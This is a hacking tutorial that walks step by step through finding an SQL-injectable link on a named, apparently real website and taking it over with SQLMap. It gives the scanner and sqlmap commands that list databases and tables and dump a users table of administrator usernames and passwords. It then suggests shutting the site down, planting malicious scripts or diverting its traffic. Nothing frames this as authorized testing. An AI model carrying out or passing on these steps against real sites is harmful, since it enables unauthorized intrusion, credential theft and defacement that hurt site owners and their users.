In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database, defacing it, address forwarding and much more.This is the most powerful attack against any website and can create a word-wide mess if done for evil purposes.
So What are we waiting for ? Lets Begin ...
What Do We Need For This Attack ?
# Backtrack 5 (Would work On Windows Too,Just find a sql injecting software)
# SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)
# Internet Access
# Brains And Balls.
# Lots Of Time.
Step-1 : Finding A Vulnerable Link.
This Is the MOST
difficult step in this step, because there are thousands of links in a
website and only some of them are capable of SQL Injection, So How to do
it ?
The trick for this is to dig in the website and look for anything that might have access to an outside server,
We
will use a scanner provided ny backtrack called "UniScan" which is good
at finding vulnerable links.To Open It,Type This In your console
(backtrack terminal) :
cd /pentest/web/uniscan && ./uniscan.pl
Follow the onscreen commands and run this tool to find the bug links,sure you can use other scanners.
Once you have found a link, check the link by adding (‘) ignore the brackets please, at the end of the link,
With an id or almost anything behind the php? and behind the = can be tested.This is because we know it selected something from the database and this might be an entry point.
For Example :
Original "vulnerable" Link : http://www.waterufo.net/item.php?id=200
After adding the symbol : http://www.waterufo.net/item.php?id=200'
If a MySQL error occurs? Then it most likely is vulnerable to SQL Injection.
Example of a MySQL error:
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''
YAYY !
Step 2 : Starting and Setting Up SQLMap :
The SQLMap is the best sql injecting tool ever made, It is good for both beginners and experts, To start it, Type the below command in console :
cd /pentest/web/scanners/sqlmap
./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs
This command will scan the full website by the help of your vulnerable link you inserted.
Now let the scan continue and wait for something like this :
If this appears, you have made you path inside that website, now press N to stop the scan cause we have already found and exploited the vulnerability.
Step 3 : Finding The Columns And Tables ( The Guess Game ) -
As we all know, the data on a website is stored in databases,inside that databases, there are tables and columns, and inside them are the required data.
Suppose my database is waterufo.net,and you have to change it as per your requirements, i'm just supposing so you can understand.We will now type this command to get the tables :
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
You will get something like this :
Now run this command to grab the columns :
/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net
Step 4 : Retrieving Usernames And Passwords -
To retrieve the column values, type --dump at the end of the previous query
For Example :
./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump
So now you have the administrator usernames and passwords, you can do a lot of things with it for example :
-> Shutdown The Website
-> Insert A Malicious Script In the website,
-> Divert their traffic to other place.
-> Write those Passwords on a brick and hit your Neighbors Kid.
Any of the above will do a lot of damage.
Post a Comment